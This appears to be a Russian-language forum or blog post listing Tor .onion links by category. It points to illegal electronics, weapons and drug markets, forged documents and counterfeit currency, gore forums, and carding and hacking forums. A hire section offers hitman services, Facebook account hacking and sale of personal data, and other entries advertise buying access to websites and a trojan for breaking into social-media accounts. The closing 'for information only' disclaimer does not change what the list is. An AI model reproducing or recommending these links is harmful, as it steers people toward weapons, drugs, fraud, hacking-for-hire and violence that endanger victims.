3.Candle http://gjobqjj7wyczbqie.onion/

5.DuckDuckGo https://3g2upl4pq6kufc4m.onion/

Нелегальные товары:
Техника и электроника
1.Цифровая техника и аксессуары за Биткоин http://amazonfkuuy6g3ou.onion
2.Смартфоны, ноутбуки, планшеты, фотоаппараты http://cardedlxzxsphu5y.onion
3.Продукция Apple, Samsung, Sony и HTC http://electrotev3tgo2p.onion
5.iPhone и линейка Galaxy http://mobileay2syyw6qf.onion
Оружие
1.Freedom, форум и маркет. На русском. http://freexd7d5vpatoe3.onion
2.Английский магазин оружия http://gunsdtk47tolcrre.onion

3.Английский маркет http://kp6yw42wb5wpsd6n.onion
4.Английский маркет http://ttagroupnnowjzzx.onion
5.Black Market Guns. На английском http://5xxqhn7qbtug7cag.onion
6.Русский маркет http://rashadowwxave5qp.onion
7.Оружие, наркотики, кардинг http://pwoah7foa6au2pul.onion/challenge.php
Поддельные документы
1.Продажа цифровых документов http://fightckxiykml2xu.onion
1.(доллары) http://counter5y4he3hny.onion
3.(евро+доллары) http://counterfxhjvtrlw.onion
5.(разные валюты) http://cfactoryxecooa6l.onion
1.Форум, посвященный насилию http://hurtmehpneqdprmj.onion
2.Насилие, жесть http://6php2xx6vczbmgcr.onion
3.Живодёры http://73lgals6htl7akfm.onion
4.Борда с жестью http://oxwugzccvk3dk6tj.onion/gore/index.html
3.Англоязычный кардинг-форум http://kickassugvgoftuk.onion
4.Кардинг и хакерство http://qzbkwswfv5k2oj5d.onion
(Alphabay market. Англоязычная площадка о кардинге, наркоте, оружии) http://pwoah7foa6au2pul.onion/challenge.php
4.Покупка-продажа криптовалют http://24xbtc424rgg5zah.onion
5.Биткоины-рубли http://konvertr6667fiat.onion
Прочее:
Хостинги. Их дохрена, но выложу немного. Если что-найдете сами
http://freedomsct2bsqtn.onion(Легендарный Freedom Hosting)
http://pic2torqdbtzkasl.onion(pic2tor-Целых два месяца хранения файлов)
https://postimage.org(Клирнет-хостинг без ограничений по времени)
Зеркала сайтов
http://arhivachovtj2jrp.onion(архивач)
http://facebookcorewwwi.onion(лицо-книга)
http://brchanansdnhvvnm.onion(бразильчан)
http://rutorc6mqdinc4cz.onion(РуТор-зеркало)
http://uj3wazyk5u4hnvtk.onion(тоже известный торрент)
Почты и общение
http://torbox3uiot6wchz.onion(ТорБокс-самый известный почтовый ящик)
http://bah37war75xzkpla.onion(ящик-анонимное общение. Шифруется)
http://enotegggr635n4lw.onion(одноразовые сообщения)
Форумы
http://lwplxqzvmgu43uff.onion(Рунион-страрейший форум, работает с 2012 года. Дел с ними иметь не советую, но почитать можно.)
http://exoduockgfq3ikf7.onion(Хацкеры. Можно скачать троян и взломать вк одноклассницы)
http://kdrcxean24rxglcy.onion(Скрытые Ответы. Можно задать вопрос)
http://answerstedhctbek.onion(Те же ответы, только на английском)
http://fantomwf4luxar7u.onion(Форум Фантом. для настоящих параноиков)
http://secretsxsrvlpawm.onion(Прочитать/написать секреты)
http://tetatl6umgbmtv27.onion(Чатик)
http://onelonhoourmypmh.onion(Анонимные русские блоги без цензуры)
http://blackhau4shlmdvg.onion
http://teranovif5tsxdb6.onion
http://rechardsp4x6tdrh.onion
http://slpwlkryjujyjhct.onion(магазин sleepWalker'а)
http://rrydrab7aba7hilt.onion(скупка инфы)
http://l33ter2w7q4bytfh.onion
http://cmarketsiuhtiix5.onion(инфа)
http://pekarmarkfovqvlm.onion(покупка доступов к сайтам)
http://chbetteratd6wskq.onion(платная проверка на лохотрон)
http://market7ow7cuw2hz.onion(создать свой магаз)
http://mystorea4mbkgt76.onion/online-store.php(создать свой магаз)
Найм специалистов
http://jymkf7sx7cldgsbl.onion(создание .onion-сайтов)
http://deagles4ioy2rvkj.onion(услуги киллеров)
http://face5njvqswhm7gf.onion(взлом акков фейсбука)
http://digigangxiehugqk.onion(хацкеры)
http://tordoxov3jitflky.onion(продажа личной информации)
Вещества
http://rutorzzmfflzllk5.onion(RuTOR)
http://xuytcbrwbxbxwnbu.onion(Зеркало РуТОР'а)
http://rusilkusru6f57uw.onion(Русский Силкроад.Крайне не рекомендую!!!)
http://wayawaytcl3k66fl.onion(WayAway, древнейший драг-форум)
http://matangaezngvjcud.onion(Matanga)
http://rashadowwxave5qp.onion(RASH, там еще много чего)
http://ramp5bb7v2abm34a.onion(РАМП. Нужен JS!!!)
http://rampshop72lq6kp6.onion(Моменталки от РАМПа)
http://playboyb2af45y45.onion(Проверенные моменталки)
http://xfmro77i3lixucja.onion(англ.)
И помните, что вся представленная информация несёт лишь ознакомительный характер и не призывает Вас к действиям нарушающим закон!